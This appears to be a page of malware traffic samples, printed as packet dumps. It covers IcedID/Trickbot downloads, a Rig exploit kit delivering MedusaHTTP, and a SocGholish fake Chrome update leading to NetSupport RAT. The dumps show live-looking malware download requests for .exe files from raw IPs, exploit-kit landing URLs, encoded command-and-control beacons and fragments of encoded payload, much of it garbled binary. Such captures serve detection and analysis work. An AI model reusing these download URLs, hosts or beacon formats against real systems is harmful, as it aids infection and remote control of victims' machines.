Text Example

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
E…. @…..
..e.<…H…4E…D.P…E…….q…m..]Q. k…,..V…kl…k…..$….!…./.5… ….. . .2.8…….,…………..wrotection.pro. ………….. 2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
E..(. …..v.<.. ..e…H..D..4FWP….2.. 2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809
E..Q.!…..L.<..
..e…H..D..4FWP………..Q…M……W……g…:…p…../.*…Z …m….s.G.Z..sN6~.._.d..V=.._a./…………………..0…0.. …… ..d…..&0.. *.H……..0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0…190630040001Z..200629040001Z0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0..0.. .H…………0……..Q…X.)t5X…..5..}}..7..5……..[……#…5.....H...$..|Z4.....QB}S.......u.pJh.../6h.......IC....o.H.3.{............/b........S0Q0...U......|{..q..nb......f.AP.0...U.#..0...|{..q..nb......f.AP.0...U.......0....0.. *.H.............3.A....7Z;.E.V....A..m..B.d..H......j..N[.P?..aQ....N...k..D..............v4.fk.L. kwr.:.U..[@.j...{~f..+Hg.........."n…………….

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
E..v.:@…..
..ek.Z..J.P…/e..&P….i..GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
E..(.V….^.k.Z.
..e.P.Je..&…}P…….
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
E..,.W….^.k.Z.
..e.P.Kb{z.R..<`….^…… 2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.;@…..
..ek.Z..K.PR.. 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
E..q.<@…..
..ek.Z..K.PR..<b{z.P…=!..GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
E..(.X….^.k.Z.
..e.P.Kb{z.R…P…….
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
E..,.Y….^.k.Z.
..e.P.L2..L….`…d%……
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.=@…..
..ek.Z..L.P….2..MP…{…
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
E..o.>@…..
..ek.Z..L.P….2..MP…….GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
E..(.Z….^.k.Z.
..e.P.L2..M…DP…{…
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
E..,.[….^.k.Z.
..e.P.My./..|..`………..
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.?@…..
..ek.Z..M.P.|..y./.P…….
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
E..q.@@…..
..ek.Z..M.P.|..y./.P…….GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P….-…………………@……. ……………CWindowDock Demo – Child 2..CWindowDock Demo – Child 1..CWindowDock Demo – Parent…Fa7b$~m?aEdng?hWoWA$Q0?1#7~fcD9h5k.1M@ijUEYlfckR2…..E+rb48gCbj9hFjI5j/ZqV2/cscyHMj8xmXmyuXHP9+PNwpxEYTfYSyGizOgAmOWp14BVb1f7S6XAi7rtvKaOuUY5aI+zUCKWvieY9aPXqkdkbt2rw/v33gTw2v/XjSE3ftxh+dcJvG+nza/fzyZ+bYUFwrNj7nrc3KG/3yZRMIVE/W4Y7yaYsqbdpWlGYY2ZLeJetiSh76GPv2pXb+3aHzVHtnSTvLCOEkY5aI9KWIFdvif89aPXA0dkbt3l4y3B3gT02v7XYiE3ftwob0tvvG+Tza/fJiZ+bYUMIAqr7nqg3KG/dCZRMIUtnRlO7yaAsqbdDGlGYY1ZQVJxtK7OlIZ/PWhXBUfK3Nx111sjZ4GxCQC07WXVlLkLNzLbqQXzY0Vk4+K7lKiQPUF0rudVKa5y6gxjFMa/vmdjxaUHpaH6kcCeQmRvZ7QpawVTQuU5MA8xI747pgtAOGg1JdwGdV1irTvVwLcvYOWXVWgBkIDC4F0DwFkgNn5mNRPGu7DqZMIqNmIk8yjXMcjhPpjAlwc4ACkgUTA3ZnRggTOnFG+XYJbuhm6zYiV+bbLkwZiRmG+XIoOoFPDU8DC1yDd+ZjS7bNxl1R6unmKuob5iurlFZG7sYqg9Lz9BFFEwwEJzyA1SnDHRl2D24gOBsqIr+to/YUXvG4NolyQ7qDQsAc9K2dzh+6ZswKZoNSpYhgcMISINQLISaWcb37RuVCpfKySuRsNhqHGGZSakaZdAwpQThTjVZ3jgSUkCX5Yb4+Mii9oEiGLPb1s7ujvyMxPGHd3VPvbk9xd3KQc77ACEPux68NSvXxHbJNjA56b3ClroBxFrcMriw1XKndvz6Ludups+mEqEqDqPxOQlL8BEz8grtugZwe31Xn65FN+d94EY056W7xubaJeBhFHKeam7Ss2gSpZmF0hul0DClBOpyBfMgb68HKlkGmLAHbuQhBbbh29haqjSI6RrRF3JBSprRup3bq8+ebRhzmTlJy+rM85nQSRRu389qHdq7WPPeXj2GbmtcfaoKUIMMN+FGG3k10hUvxbLJdXwStuo9b0z6Ki6hCV5PRHqzutxgl7J6gJY5SMHEFSo3BEE2mgjMvS8NkJgm7IoLSmkzzTD62mO5HqZwKQaf7Rk5WyYqYWuz8AKZssKdOgRzS4OX5M0iQSieyA2tIQYp+Uiz2fgayfKINIz+NrI……..E+rb48hWbz9hxhliZ0Fu1BJbUVpWA//YqTp+Zu4BsTi4Z+8XibBvJH7u+2mDIeJn+e03k
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My..O.|..P….z..Ki+UZe1Xs7cyA2g5ibGl8pPrcMCyJ3bDKu6BbqbkVT57TKQqL4Wl7VZztzIfqDmLMaXymetwwjIndsbq7oLupuRFPntPJCovleXtVPO3MgfoOYpxpfKTa3DD8id2xurug66m5El+e0nkKi+S5e1Ts7cyAag5jbGl8prrcMSyJ3bfqu6gbibkQb57baSqL5Al7XdzNzICKDmp8SXykutw4XKndsOq7qEuJuRDvntsZKovheXtdjM3MhMoOasxJfKBK3DiMqd2xqruou4m5EL+e28kqi+SJe108zcyH6g5rTEl8pprcOQyp3bDKu6k7ibkR757aSSqL5Ul7XLzNzICqDmscSXymutw5fKndsdq7qWuJuRFvntr5KovlGXtcbM3MgXoOa+xJfKWK3Dmsqd2xurup24m5Ek+e2qkqi+S5e1wczcyBCg5rvEl8percNhyZ3bG6u6YLubkR/57VWRqL5Ql7U8z9zIP6DmQMeXyiqtwxXInds9q7oUupuRFfntIZCovl2XtUjO3MgOoOY8xpfKXq3DGMid2zeruhu6m5EK+e0skKi+VJe1Q87cyBGg5jnGl8pYrcMfyJ3bCqu6HrqbkSz5LdcKkQSlKPZ6syPx+yqcu8Yr868muZ7IEOL7I8Ceuh2o4nCXqJAnh6EBz8DOV/H7N5y7xi3zrzm5nsgM4vs+wJ66B6jia5eokCWHoQTPwM5a8fswnLvGGPOvPLmeyBbi+zXAnrpk4/LflaiQBb5x1bl6pa6yjpucu2njeL46uTS/62Hi4KoVupuRNbQtwz+oFKzYdZ+8rnuBmZwVsj2heJQT6b4ngLjoL5+6m2mhunmpkKhD4tQiwc7cN7jjcLrGlzXs7lKfyJ0kuOgqn7qbyqG6fqmQqEHi1CfBztw3uON7usaXZ+zuX5/InXe46CWfupsvobpzqZCoc+LULMHO3De44366xpc37O5Yn8idJLjoIJ+6m26hukipkKhA4tQRwc7cN7jjQbrGlzXs7mWfyJ0kuOgbn7qbxaG6TamQqK7i1BbBztzNuONEusaX8+zubp/InVm46BafupuGobpCqZCon+LUG8HO3My440+6xpdd7O5rn8idHLjoEZ+6m2ehukepkKjT4tQAwc7c7rjjUrrGl3fs7nSfyJ1auOgMn7qbBaG6XKmQqMji1AXBztypuONVusaXFOzucZ/InfO46Aefups8obpRqZCoXeLUCsHO3K6441i6xpcJ7O56n8idM7joAp+6myahulapkKgP4tQPwc7cDbjjI7rGl3Hs7gefyJ0muOh9n7qbnKG6K6mQqLvi1HTBztxDuOMmusaXYuzuAJ/Inf646HifupuKobogqZCokuLUecHO3Pe44ym6xpcA7O4Nn8idQ7joc5+6m5ShuiWpkKgv4tR+wc7c6LjjLLrGl03s7hafyJ1ouOhun7qbG6G6OqmQqHTi1GPBztwru
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
E..(.^@…..
..ek.Z..K.PR…b{.uP….Z..
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P…F…OM3usaXlezuE5/InVC46Gmfupsnobo/qZCoouLUaMHO3Be44zq6xpcm7O4cn8idVbjoZJ+6m1uhujSpkKgk4tRtwc7c6LjjPbrGlyfs7hmfyJ0EuOhfn7qbm6G6CamQqLTi1FLBztzCuOMAusaX9OzuIp/Incm46FqfupsyoboOqZCo0OLUV8HO3AG44wu6xpdA7O4vn8idlLjoVZ+6m8ehugOpkKjd4tRcwc7cM7jjDrrGl+7s7iifyJ0ouOhQn7qb4qG6GKmQqP7i1EHBztyuuOMRusaXQOzuNZ/InTe46EufupsQobodqZCoxuLURsHO3Le44xS6xpd+7O4+n8idVbjoRp+6m/qhuhKpkKj54tRLwc7cN7jjH7rGl5Xs7jufyJ1ZuOhBn7qb2aG6F6mQqBLi1LDBztzquOPiusaXFezuxJ/InUe46LyfupuAobrsqZCotuLUtcHO3LS44+W6xpd07O7Bn8id2rjot5+6m3ihuuGpkKjm4tS6wc7cWbjj6LrGl+rs7sqfyJ0FuOiyn7qbE6G65qmQqDfi1L/Bztz3uOPzusaXsOzu15/InfG46K2fupsLobr7qZCoPuLUpMHO3De44/a6xpcW7O7Qn8idc7joqJ+6myuhuvCpkKgT4tSpwc7cNbjj+brGl6js7t2fyJ3OuOijn7qbB6G69amQqO3i1K7BztwouOP8usaXyOzu5p/InRu46J6fupviobrKqZCoC+LUk8HO3Oe448e6xpc07O7jn8idJLjomZ+6m26hus+pkKhB4tSYwc7cN7jjyrrGlzXs7uyfyJ0kuOiUn7qbbqG6xKmQqEHi1J3Bztw3uOPNusaXNezu6Z/InSS46I+fuptuobrZqZCoQeLUgsHO3De449C6xpc17O7yn8idJLjoip+6m26hut6pkKhB4tSHwc7cN7jj27rGlzXs7v+fyJ0kuOiFn7qbbqG606mQqEHi1IzBztw3uOPeusaXNezu+J/InSS46ICfuptuobqoqZCoQeLU8cHO3De446G6xpc17O6Fn8idJLjo+5+6m2+huq2pkKhB4tT2wc7cN7jjpLrGlzXs7o6fyJ0kuOj2n7qbbqG6oqmQqEHi1PvBztw3uOOvusaXNezui5/InSS46PGfuptuobqnqZCoQeLU4MHO3De447K6xpc17O6Un8idJLjo7J+6m26hurypkKhB4tTlwc7cN7jjtbrGlzXs7pGfyJ0kuOjnn7qbbqG6samQqEHi1OrBztw3uOO4usaXNezump/InSS46OKfuptuobq2qZCoQeLU78HO3De444O6xpc17O6nn8idJLjo3Z+6m26huoupkKhB4tTUwc7cU7jjhrrGl+Ds7qCfyJ2OuOjYn7qb36G6gKmQqOfi1NnBztw0uOOJusaXLezurZ/Inba46NOfupttobqFqZCo6+LU3sHO3Aa444y6xpcb7O62n

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
E…:.@…..
…........)a..t..P...F……”….[…>.:.8. .E8..[ 3…..K… 6......H..M...+.......K.>.5b.......QE...p.....aR.......q….4….R…….c.%.v.”….}…..M…6…beD.a1d……. …R………..De…MY…X.KO..TN.F...>.Ns.x..s..w..e.m..e.m. .z......{..[.4.b.).@J...?-.;} .,.6...8.m..e0.yZ.[..I{.4..?4.n,..#Sk...lv....CX.wB.,H........ ..H9ib......|bO@...._U..:.{DL-Yd..r...n<.?...$....?.....=..'.pvqD.{ .~j..0J...?q.KM..C..+C....o.}..V...O...Hc.........1....'$>....P..z...b.P..... n1.%...D.......1...c..6..."]. .J:.n.[O-.A......N...(.VD.6....vLXt..r...1.J.F1.B.u.....^......(....H.....l.=af.].c...C.9C.r.......P.1..X5.r......BB.2..?h..#..._.qZ....ou.^p.a^g...V....[9......k\[wl.!i6..7...{.A<.n.'..j...BQ..g....v..!..:A....GT.4.....W.jI .V._cM9._..\ .Ka..y..sN.*..flF..D.. \.=..,.8[oG...{gVL.... 6y.Z....N...6X..........a....#..(.......Q.s...\S..c5.._cM.^.....[..\.V..o….x.Mv.6,.r.+…….O..R…B..2&&.K%….:A..n.E .BI.H.8L..e..’….T.Z.y 2w/F..d.;.0L…?……5…).K..g)..v!.B..:?f…….L..[…;..@…)….F…N…Y.”.6>..ai@….[.,.g..&… }..$…………....i..0.8./.Zid |m[....[n........|..ay/|.:.Z~.A...Y...........!)..Y*Mo.])...N........Hs.......c..v......H2.&e....#9..6_.......4x...O I.t.:...I..b......j..8.Cxk.m.C.u...s.K......$..w..k5...._....{T....98...R...I.....4.w.).0@.......cl.Ph,.+u..>~W ..x.;3..q|e.8...qW?..d4..?..i.dw...F..W.~.K......bG......~.f.....G.R.:L.#...r.-.........lG......U.)..B......st.iE....S7.+...0~...2Z..I.W.u{.............8\.o..S7...}D.C.f[ 2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0 E..(;......b... ……..t…)g.P…zQ.. 2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0 E..(:.@….. ….F(……:ka. 4=P…vC.. 2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627 E…:.@….. …........)g..t..P....9...x....4.A.~. ...K...&....f....].......=...s.{.95....4..oE...RH..MM.R...D...\..E.TDYV0.koM.9.. ..N.........8....~.]..}(G..... ...Iyvb....@e.M....Q>eW..=m...$..S.1S^.....62...2D.s}.m..._..<..m......_..].q~..x..,N...aIE.Q.g..MZi.99./.T.c...s...F~U....:..?e...).'2T.]&.#...IL\...gv..,}..i{_....&..fGel.T.]...r.....b.W1.....W..u.....KlS".7>..”.=..!..C..;..r..F..x…)…..?8… …d..i.R..6.}u..a…….u#.w^nw.Z.c%…IOL.-…gJ……bH6).Dh%.v…’F……c.6….&.lZ….A…r..D….H/]C.r.H…../..r~9 C.g..N[l/..9......":.._.G.9r\b....!.......G&............<.. .P....of.;…..:.pB…3.~q<….(.S.:…f..x.7 H./%……p.<…h. 2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
E..(;……a... ........t...)j.P...w... 2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0 E..(;......... ........t...)j.P...w... 2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0 E..(:.@....G .....……)j..t..P…r…
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
E..(:.@…..
….F(……:ka. 4=P…vB..
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
E..(;……..F(.
…….. 4=.:kbP…{R..
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
E..U;……1... .........9Q5...P..............%....18FC78E29C1478DA645838C4DD2B2195. 2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0 E..4:.@....9 .....…..W..h………P…………..

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=hea
rtfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspV
WdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvP
aqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqk
mbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
